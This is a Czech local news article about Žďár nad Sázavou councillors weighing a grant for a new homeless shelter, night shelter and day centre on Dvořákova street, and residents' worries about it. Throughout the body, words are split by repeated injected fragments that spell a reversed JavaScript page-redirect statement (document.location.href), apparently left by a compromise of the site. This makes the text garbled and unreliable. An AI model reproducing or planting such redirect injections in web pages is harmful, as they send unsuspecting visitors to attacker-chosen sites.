Rainbow page separator

Žďárští zastupitelé budou rozhodovat o novém azylovém domě

Neděle, 25. března 2018

Azylová ubytovna pro muže, Žďár nad Sázavou

Žďár nad Sázavou / Žďárští zastupitelé budou rozhodovat o [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom, zda měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to požádá o dotaci na vybudování centra sociálních služeb ve Dvořákově ulici. To by znamenalo nový azylový dům složený z modulových komponentů, který by mimo azylové uby[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovny s dvaceti lůžky zahrnul i noclehárnu pro šest osob bez přístřeší a denní centrum. Centrum sociálních služeb má být ve Žďáře vybudováno v rámci strategického plánu sociálního začleňování pro období 2016 – 2019.
S výstavbou azylového domu se počítalo již v loňském roce, avšak nebyla vypsána odpovídající dotace, takže na realizaci záměru nedošlo. Obyvatelé Dvořákovy ulice však již tehdy vyjádřili obavu ze zvýšení počtu osob s problémovým chováním v lokalitě a požádali radnici o zvážení umístění centra jinde.
Jiné vhodné mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to se však městu najít nepodařilo, nicméně obyvatelům slibuje, že s centrem v řídce osídlené ulici naopak dojde k vyšší míře bezpečí, pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tože tam přibude také kamerový systém, poby[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tová místnost pro asistenty prevence kriminality a mimo [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to i osvětlení a nové chodníky.
Za předpokladu, že k výstavbě azylového domu ve Dvořákově ulici dojde, stávající azylovou uby[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovnu pro muže ve svobodárně číslo 5 v Brodské ulici měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to nechá přestavět na menší byty.